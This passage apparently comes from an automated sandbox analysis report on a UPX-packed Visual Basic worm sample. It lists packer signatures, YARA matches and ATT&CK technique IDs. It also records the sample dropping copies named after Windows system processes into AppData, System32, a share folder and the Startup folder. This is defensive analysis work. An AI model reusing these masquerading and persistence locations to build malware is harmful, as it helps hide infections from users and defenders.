name: \"Compiler\"\n \"New Folder.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Data HAPUBWS.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"Data HAPUBWS.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"Data HAPUBWS.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SERVICES .exe\" was detected as \"UPX\" and name: \"Packer\"\n \"SERVICES .exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"SERVICES .exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Empty.pif\" was detected as \"UPX\" and name: \"Packer\"\n \"Empty.pif\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"Empty.pif\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SERVICES.EXE\" was detected as \"UPX\" and name: \"Packer\"\n \"SERVICES.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"SERVICES.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SMSS.EXE\" was detected as \"UPX\" and name: \"Packer\"\n \"SMSS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"SMSS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"LSASS.EXE\" was detected as \"UPX\" and name: \"Packer\"\n \"LSASS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"LSASS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"4K51K4.EXE.67A9DCB2.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"4K51K4.EXE.67A9DCB2.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"4K51K4.EXE.67A9DCB2.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"MrHelloween.scr\" was detected as \"UPX\" and name: \"Packer\"\n \"MrHelloween.scr\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"MrHelloween.scr\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IEXPLORER.EXE.67A9C389.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"IEXPLORER.EXE.67A9C389.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IEXPLORER.EXE.67A9C389.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"WINLOGON.EXE\" was detected as \"UPX\" and name: \"Packer\"\n \"WINLOGON.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"WINLOGON.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1\" has an executable section named \"UPX0\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1\" has an executable section named \"UPX1\"\n \"services.exe\" has an executable section named \"UPX0\"\n \"services.exe\" has an executable section named \"UPX1\"\n \"shell.exe\" has an executable section named \"UPX0\"\n \"shell.exe\" has an executable section named \"UPX1\"\n \"4k51k4.exe\" has an executable section named \"UPX0\"\n \"4k51k4.exe\" has an executable section named \"UPX1\"\n \"IExplorer.exe\" has an executable section named \"UPX0\"\n \"IExplorer.exe\" has an executable section named \"UPX1\"\n \"New Folder.exe\" has an executable section named \"UPX0\"\n \"New Folder.exe\" has an executable section named \"UPX1\"\n \"Data HAPUBWS.exe\" has an executable section named \"UPX0\"\n \"Data HAPUBWS.exe\" has an executable section named \"UPX1\"\n \"SERVICES .exe\" has an executable section named \"UPX0\"\n \"SERVICES .exe\" has an executable section named \"UPX1\"\n \"Empty.pif\" has an executable section named \"UPX0\"\n \"Empty.pif\" has an executable section named \"UPX1\"\n \"SERVICES.EXE\" has an executable section named \"UPX0\"\n \"SERVICES.EXE\" has an executable section named \"UPX1\"\n \"SMSS.EXE\" has an executable section named \"UPX0\"\n \"SMSS.EXE\" has an executable section named \"UPX1\"\n \"LSASS.EXE\" has an executable section named \"UPX0\"\n \"LSASS.EXE\" has an executable section named \"UPX1\"\n \"4K51K4.EXE.67A9DCB2.bin\" has an executable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1\" has an writable section named \"UPX0\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1\" has an writable section named \"UPX1\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1\" has an writable section named \".rsrc\"\n \"services.exe\" has an writable section named \"UPX0\"\n \"services.exe\" has an writable section named \"UPX1\"\n \"services.exe\" has an writable section named \".rsrc\"\n \"shell.exe\" has an writable section named \"UPX0\"\n \"shell.exe\" has an writable section named \"UPX1\"\n \"shell.exe\" has an writable section named \".rsrc\"\n \"4k51k4.exe\" has an writable section named \"UPX0\"\n \"4k51k4.exe\" has an writable section named \"UPX1\"\n \"4k51k4.exe\" has an writable section named \".rsrc\"\n \"IExplorer.exe\" has an writable section named \"UPX0\"\n \"IExplorer.exe\" has an writable section named \"UPX1\"\n \"IExplorer.exe\" has an writable section named \".rsrc\"\n \"New Folder.exe\" has an writable section named \"UPX0\"\n \"New Folder.exe\" has an writable section named \"UPX1\"\n \"New Folder.exe\" has an writable section named \".rsrc\"\n \"Data HAPUBWS.exe\" has an writable section named \"UPX0\"\n \"Data HAPUBWS.exe\" has an writable section named \"UPX1\"\n \"Data HAPUBWS.exe\" has an writable section named \".rsrc\"\n \"SERVICES .exe\" has an writable section named \"UPX0\"\n \"SERVICES .exe\" has an writable section named \"UPX1\"\n \"SERVICES .exe\" has an writable section named \".rsrc\"\n \"Empty.pif\" has an writable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Pattern Matching", "identifier": "yara-140", "type": 13, "relevance": 2, "name": "YARA signature match – Embedded PE executable", "description": "YARA signature matched on embedded PE in file \"IExplorer.exe\"\n YARA signature matched on embedded PE in file \"IEXPLORER.EXE.67A9DCF1.bin\"\n YARA signature matched on embedded PE in file \"MrHelloween.scr\"\n YARA signature matched on embedded PE in file \"SERVICES.EXE.bin\"\n YARA signature matched on embedded PE in file \"SERVICES.EXE\"\n YARA signature matched on embedded PE in file \"4k51k4.exe\"\n YARA signature matched on embedded PE in file \"4K51K4.EXE.67A9DDC9.bin\"\n YARA signature matched on embedded PE in file \"New Folder.exe\"\n YARA signature matched on embedded PE in file \"Data HAPUBWS.exe\"\n YARA signature matched on embedded PE in file \"4K51K4.EXE.67A9C387.bin\"\n YARA signature matched on embedded PE in file \"shell.exe\"\n YARA signature matched on embedded PE in file \"sample.bin\"\n YARA signature matched on embedded PE in file \"services.exe.4117321292\"\n YARA signature matched on embedded PE in file \"smss.exe.4005060860\"\n YARA signature matched on embedded PE in file \"CSRSS.EXE.bin\"\n YARA signature matched on embedded PE in file \"LSASS.EXE.1040345820\"\n YARA signature matched on embedded PE in file \"winlogon.exe.126363991\"\n YARA signature matched on embedded PE in file \"CSRSS.EXE.1193636291\"\n YARA signature matched on embedded PE in file \"lsass.exe.2301683228\"\n YARA signature matched on embedded PE in file \"4k51k4.exe.2703315366\"\n YARA signature matched on embedded PE in file \"IExplorer.exe.3960633184\"\n YARA signature matched on embedded PE in file \"csrss.exe.1798262080\"\n YARA signature matched on embedded PE in file \"WINLOGON.EXE.1707694775\"\n YARA signature matched on embedded PE in file \"SMSS.EXE.564077212\"", "origin": "YARA Signature", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"services.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"shell.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"4k51k4.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"IExplorer.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"New Folder.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"Data HAPUBWS.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"SERVICES .exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"Empty.pif\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"SERVICES.EXE\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"SMSS.EXE\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"LSASS.EXE\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"4K51K4.EXE.67A9DCB2.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"MrHelloween.scr\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"IEXPLORER.EXE.67A9C389.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"WINLOGON.EXE\" was detected as \"Netopsystems FEAD Optimizer 1\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"services.exe\" - Location: [%LOCALAPPDATA%\\services.exe]- [targetUID: 00000000-00005284]\n Dropped file: \"SERVICES.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00003924]\n Dropped file: \"SMSS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00003924]\n Dropped file: \"LSASS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00003924]\n Dropped file: \"WINLOGON.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00003924]\n Dropped file: \"lsass.exe\" - Location: [%LOCALAPPDATA%\\lsass.exe]- [targetUID: 00000000-00005284]\n Dropped file: \"IExplorer.exe\" - Location: [%LOCALAPPDATA%\\IExplorer.exe]- [targetUID: 00000000-00003924]\n Dropped file: \"4k51k4.exe\" - Location: [%LOCALAPPDATA%\\4k51k4.exe]- [targetUID: 00000000-00003924]\n Dropped file: \"winlogon.exe\" - Location: [%LOCALAPPDATA%\\winlogon.exe]- [targetUID: 00000000-00005284]\n Dropped file: \"smss.exe\" - Location: [%LOCALAPPDATA%\\smss.exe]- [targetUID: 00000000-00005284]\n Dropped file: \"csrss.exe\" - Location: [%LOCALAPPDATA%\\csrss.exe]- [targetUID: 00000000-00005284]\n Dropped file: \"LSASS.EXE\" - Location: [%LOCALAPPDATA%\\LSASS.EXE]- [targetUID: 00000000-00003924]\n Dropped file: \"SMSS.EXE\" - Location: [%LOCALAPPDATA%\\SMSS.EXE]- [targetUID: 00000000-00003924]\n Dropped file: \"SERVICES.EXE\" - Location: [%LOCALAPPDATA%\\SERVICES.EXE]- [targetUID: 00000000-00003924]\n Dropped file: \"WINLOGON.EXE\" - Location: [%LOCALAPPDATA%\\WINLOGON.EXE]- [targetUID: 00000000-00003924]\n Dropped file: \"CSRSS.EXE\" - Location: [%LOCALAPPDATA%\\CSRSS.EXE]- [targetUID: 00000000-00003924]\n Dropped file: \"CSRSS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00003924]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to touch file \"C:\\MSVBVM60.DLL\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to touch file \"C:\\Windows\\system32\\MSVBVM60.DLL\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to touch file \"C:\\Windows\\system32\\rpcss.dll\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to touch file \"C:\\CRYPTBASE.dll\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to touch file \"C:\\Windows\\system32\\CRYPTBASE.dll\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to touch file \"\\Device\\KsecDD\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to touch file \"C:\\Windows\\system32\\uxtheme.dll\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to touch file \"C:\\0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe.cfg\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to touch file \"C:\\SXS.DLL\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to touch file \"C:\\Windows\\system32\\SXS.DLL\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to touch file \"C:\\Windows\\system32\\c_932.nls\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to touch file \"C:\\Windows\\system32\\c_949.nls\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to touch file \"C:\\Windows\\system32\\c_950.nls\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to touch file \"C:\\Windows\\system32\\c_936.nls\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to access non-existent file \"C:\\0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe.cfg\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to access non-existent file \"C:\\0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe.Local\\\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to access non-existent file \"C:\\0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.pif\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to access non-existent file \"C:\\MSVBVM60.DLL\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to access non-existent file \"C:\\SXS.DLL\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to access non-existent file \"C:\\CRYPTSP.dll\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to access non-existent file \"C:\\dwmapi.dll\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\LSASS.exe\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SMSS.EXE\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to access non-existent file \"C:\\Windows\\4k51k4.exe\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to access non-existent file \"C:\\4k51k4.exe\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to access non-existent file \"C:\\Windows\\system32\\shell.exe\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local.exe\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" writes file \"c:\\users\\hapubws\\appdata\\local\\services.exe\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" writes file \"c:\\share\\data hapubws.exe\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" writes file \"c:\\windows\\4k51k4.exe\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" writes file \"c:\\4k51k4.exe\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" writes file \"c:\\windows\\system32\\shell.exe\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" writes file \"c:\\windows\\system32\\mrhelloween.scr\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" writes file \"c:\\windows\\system32\\iexplorer.exe\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" writes file \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\empty.pif\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\winlogon.exe\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\csrss.exe\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\services.exe\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\lsass.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" connecting to \"\\ThemeApiPort\"\n \"4k51k4.exe\" connecting to \"\\ThemeApiPort\"\n \"IExplorer.exe\" connecting to \"\\ThemeApiPort\"\n \"CSRSS.EXE\" connecting to \"\\ThemeApiPort\"\n \"SMSS.EXE\" connecting to \"\\ThemeApiPort\"\n \"LSASS.EXE\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" touched file \"C:\\Windows\\4k51k4.exe\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" touched file \"C:\\Windows\\System32\\shell.exe\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" touched file \"C:\\Windows\\System32\\MrHelloween.scr\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" touched file \"C:\\Windows\\System32\\IExplorer.exe\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" touched file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-235", "type": 6, "relevance": 1, "name": "Queries basic information of the specified process", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\services.exe\" (UID: 5284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\lsass.exe\" (UID: 5284)\n \"4k51k4.exe\" queries basic process information of the \"C:\\share\\4K51K4\\Folder.htt\" (UID: 5232)\n \"4k51k4.exe\" queries basic process information of the \"C:\\Windows\\System32\\tzres.dll\" (UID: 5232)\n \"IExplorer.exe\" queries basic process information of the \"C:\\share\" (UID: 3876)\n \"IExplorer.exe\" queries basic process information of the \"C:\\share\\4K51K4\\New Folder.exe\" (UID: 3876)\n \"WINLOGON.EXE\" queries basic process information of the \"C:\\share\" (UID: 3924)\n \"WINLOGON.EXE\" queries basic process information of the \"C:\\Windows\\System32\\tzres.dll\" (UID: 3924)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" reads file \"c:\\users\\desktop.ini\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" reads file \"c:\\users\\%osuser%\\documents\\desktop.ini\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" reads file \"c:\\0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" reads file \"c:\\windows\\4k51k4.exe\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" reads file \"c:\\4k51k4.exe\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" reads file \"c:\\windows\\system32\\shell.exe\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" reads file \"c:\\windows\\system32\\iexplorer.exe\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" reads file \"c:\\windows\\system32\\mrhelloween.scr\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" reads file \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\empty.pif\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\windows\\winlogon.exe\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\windows\\csrss.exe\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\windows\\services.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": 